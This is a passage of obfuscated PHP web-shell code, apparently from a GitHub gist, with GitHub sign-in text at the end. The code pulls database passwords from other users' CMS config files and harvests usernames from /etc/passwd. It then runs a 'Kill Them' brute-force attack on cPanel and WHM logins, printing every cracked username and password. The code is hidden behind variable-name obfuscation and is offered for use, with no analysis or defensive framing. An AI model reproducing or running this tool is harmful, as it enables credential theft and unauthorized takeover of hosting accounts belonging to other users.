echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
$hjtezrws="db";
echo$ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
=entre2v2($ {
$ynqhaxyy
}
,"dbpass = \"","\";");
if(!empty($ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
))$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
=$ {
$hjtezrws
}
."
";
fwrite($ {
$ {
"GLOBALS"
}
["xqjsjx"]
}
,$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
);
}
}
}
}
echo "
<form method=post>
<input type=submit name=cpanel value=\"Auto username/password loading cpanel cracker\"><p>
";
if(isset($_POST["cpanel"])) {
echo "<form method=post><div align=center><table>
want to brute=><select name=\"op\"> <option name=\"op\" value=\"cp\">CPanel</option>
<option name=\"op\" value=\"whm\">WHMPanel</option></table><p>
<textarea style=\"background:black;color:white\" rows=20 cols=25 name=usernames >";
$porqnvoe="d";
$ {
$ {
"GLOBALS"
}
["oqvsusmuih"]
}
=file("/etc/passwd");
foreach($ {
$ {
"GLOBALS"
}
["oqvsusmuih"]
}
as$ {
$ {
"GLOBALS"
}
["mppsifb"]
}
) {
$lpbvwsc="str";
$ {
$lpbvwsc
}
=explode(":",$ {
$ {
"GLOBALS"
}
["mppsifb"]
}
);
echo$ {
$ {
"GLOBALS"
}
["tnsglnuwozs"]
}
[0]."
";
}
echo "</textarea><textarea style=\"background:black;color:white\" rows=20 cols=25 name=passwords >
";
$ {
"GLOBALS"
}
["hifnaqbo"]="rt";
$ {
$ {
"GLOBALS"
}
["frnguil"]
}
=getcwd()."/r.txt";
$ {
$ {
"GLOBALS"
}
["mpzmgvjrk"]
}
=file($ {
$porqnvoe
}
);
foreach($ {
$ {
"GLOBALS"
}
["mpzmgvjrk"]
}
as$ {
$ {
"GLOBALS"
}
["hifnaqbo"]
}
) {
$ {
"GLOBALS"
}
["rxcdwquaxrv"]="str";
$ {
$ {
"GLOBALS"
}
["rxcdwquaxrv"]
}
=explode("\\n",$ {
$ {
"GLOBALS"
}
["pkxusn"]
}
);
echo trim($ {
$ {
"GLOBALS"
}
["tnsglnuwozs"]
}
[0])."
";
}
echo "</textarea><p>
<input type=submit name=cpanelcracking value=\"Kill Them\"></form>
";
}
$jgbrxerezme="connect_timeout";
echo "
";
error_reporting(0);
$ {
$jgbrxerezme
}
=5;
set_time_limit(0);
$ {
$ {
"GLOBALS"
}
["fhuebeob"]
}
=$_POST["usernames"];
$ {
$ {
"GLOBALS"
}
["avvdiennau"]
}
=$_POST["passwords"];
$ {
$ {
"GLOBALS"
}
["jtxbycj"]
}
=$_POST["op"];
$ {
$ {
"GLOBALS"
}
["ytidfmauvywq"]
}
="localhost";
if(isset($_POST["cpanelcracking"])) {
$ {
"GLOBALS"
}
["ryljoecvcpn"]="passl";
$qggkxhpojj="userl";
if($ {
$qggkxhpojj
}
!==""&&$ {
$ {
"GLOBALS"
}
["ryljoecvcpn"]
}
!=="") {
$ {
"GLOBALS"
}
["tjgmxqwijql"]="userl";
if($_POST["op"]=="cp") {
$eftvchhiwf="cracked";
$ {
$ {
"GLOBALS"
}
["cmlkxbh"]
}
=$_POST["crack"];
@fopen($ {
$eftvchhiwf
}
,"a");
echo"now we are attacking cpanels....please wait till the end of process
";
} elseif($_POST["op"]=="whm") {
@fopen($ {
$ {
"GLOBALS"
}
["cmlkxbh"]
}
,"a");
echo"now we are attacking WHM panel....please wait till the end of process";
}
function cpanel($host,$user,$pass,$timeout) {
$ {
"GLOBALS"
}
["ltiohgnp"]="ch";
$ {
"GLOBALS"
}
["ymjcnlxywym"]="data";
$ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
=curl_init();
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_URL,"http://$host:2082");
$ {
"GLOBALS"
}
["rvlqflyggs"]="ch";
$yoqgvcb="ch";
curl_setopt($ {
$ {
"GLOBALS"
}
["rvlqflyggs"]
}
,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ {
$ {
"GLOBALS"
}
["ltiohgnp"]
}
,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_USERPWD,"$user:$pass");
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_CONNECTTIMEOUT,$ {
$ {
"GLOBALS"
}
["ainkhzdg"]
}
);
$rcmngcbqlp="ch";
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_FAILONERROR,1);
$ {
$ {
"GLOBALS"
}
["ymjcnlxywym"]
}
=curl_exec($ {
$rcmngcbqlp
}
);
if(curl_errno($ {
$yoqgvcb
}
)==0) {
echo"<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
}
curl_close($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
);
}
$ {
$ {
"GLOBALS"
}
["cywofo"]
}
=explode("
",$ {
$ {
"GLOBALS"
}
["afrrfxkgbv"]
}
);
$ {
$ {
"GLOBALS"
}
["iasgvgve"]
}
=explode("
",$ {
$ {
"GLOBALS"
}
["avvdiennau"]
}
);
if($ {
$ {
"GLOBALS"
}
["jtxbycj"]
}
=="cp") {
$rqqyjvw="userlist";
foreach($ {
$rqqyjvw
}
as$ {
$ {
"GLOBALS"
}
["mppsifb"]
}
) {
$ {
"GLOBALS"
}
["jkbgmwekkxo"]="user";
$ {
"GLOBALS"
}
["nfrmapgqp"]="password";
echo"<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
$ {
$ {
"GLOBALS"
}
["wqykbxlcrzw"]
}
=trim($ {
$ {
"GLOBALS"
}
["jkbgmwekkxo"]
}
);
foreach($ {
$ {
"GLOBALS"
}
["iasgvgve"]
}
as$ {
$ {
"GLOBALS"
}
["nfrmapgqp"]
}
) {
$ {
"GLOBALS"
}
["vfloulq"]="finaluser";
$ {
"GLOBALS"
}
["gugnulvu"]="password";
$ {
"GLOBALS"
}
["zthmsnxjxpd"]="finalpass";
$ {
$ {
"GLOBALS"
}
["zthmsnxjxpd"]
}
=trim($ {
$ {
"GLOBALS"
}
["gugnulvu"]
}
);
cpanel($ {
$ {
"GLOBALS"
}
["qkfpdhf"]
}
,$ {
$ {
"GLOBALS"
}
["vfloulq"]
}
,$ {
$ {
"GLOBALS"
}
["onsdfdthx"]
}
,$ {
$ {
"GLOBALS"
}
["trhahkqrevw"]
}
);
}
}
}
$vlxjwdbxb="attack";
function whm($host,$user,$pass,$timeout) {
$dxtkzggvz="ch";
$ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
=curl_init();
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_URL,"http://$host:2086");
$ {
"GLOBALS"
}
["punmlep"]="ch";
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_RETURNTRANSFER,1);
$brltfbtspgf="ch";
$ {
"GLOBALS"
}
["rbyfstgofou"]="ch";
curl_setopt($ {
$dxtkzggvz
}
,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_USERPWD,"$user:$pass");
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_CONNECTTIMEOUT,$ {
$ {
"GLOBALS"
}
["ainkhzdg"]
}
);
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_FAILONERROR,1);
$ {
$ {
"GLOBALS"
}
["tmwmkkbdjy"]
}
=curl_exec($ {
$ {
"GLOBALS"
}
["punmlep"]
}
);
if(curl_errno($ {
$brltfbtspgf
}
)==0) {
echo"<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
}
curl_close($ {
$ {
"GLOBALS"
}
["rbyfstgofou"]
}
);
}
$pjjgkbchjh="userlist";
$ {
"GLOBALS"
}
["iuvrfxys"]="passl";
$ {
$pjjgkbchjh
}
=explode("
",$ {
$ {
"GLOBALS"
}
["tjgmxqwijql"]
}
);
$ {
$ {
"GLOBALS"
}
["iasgvgve"]
}
=explode("
",$ {
$ {
"GLOBALS"
}
["iuvrfxys"]
}
);
if($ {
$vlxjwdbxb
}
=="whm") {
$vilwukxpjzn="userlist";
foreach($ {
$vilwukxpjzn
}
as$ {
$ {
"GLOBALS"
}
["mppsifb"]
}
) {
echo"<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
$ {
"GLOBALS"
}
["uxvypjylg"]="password";
$ {
$ {
"GLOBALS"
}
["wqykbxlcrzw"]
}
=trim($ {
$ {
"GLOBALS"
}
["mppsifb"]
}
);
foreach($ {
$ {
"GLOBALS"
}
["iasgvgve"]
}
as$ {
$ {
"GLOBALS"
}
["uxvypjylg"]
}
) {
$ {
"GLOBALS"
}
["pdqibcl"]="finalpass";
$iorfkywtph="finalpass";
$ {
$ {
"GLOBALS"
}
["pdqibcl"]
}
=trim($ {
$ {
"GLOBALS"
}
["urgtxxu"]
}
);
whm($ {
$ {
"GLOBALS"
}
["qkfpdhf"]
}
,$ {
$ {
"GLOBALS"
}
["wqykbxlcrzw"]
}
,$ {
$iorfkywtph
}
,$ {
$ {
"GLOBALS"
}
["trhahkqrevw"]
}
);
}
}
}
} elseif($ {
$ {
"GLOBALS"
}
["afrrfxkgbv"]
}
=="") {
echo"what are you doing :( , you have left userlist field empty";
} elseif($ {
$ {
"GLOBALS"
}
["avvdiennau"]
}
=="") {
echo"please put passwords in paasword list field";
}
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment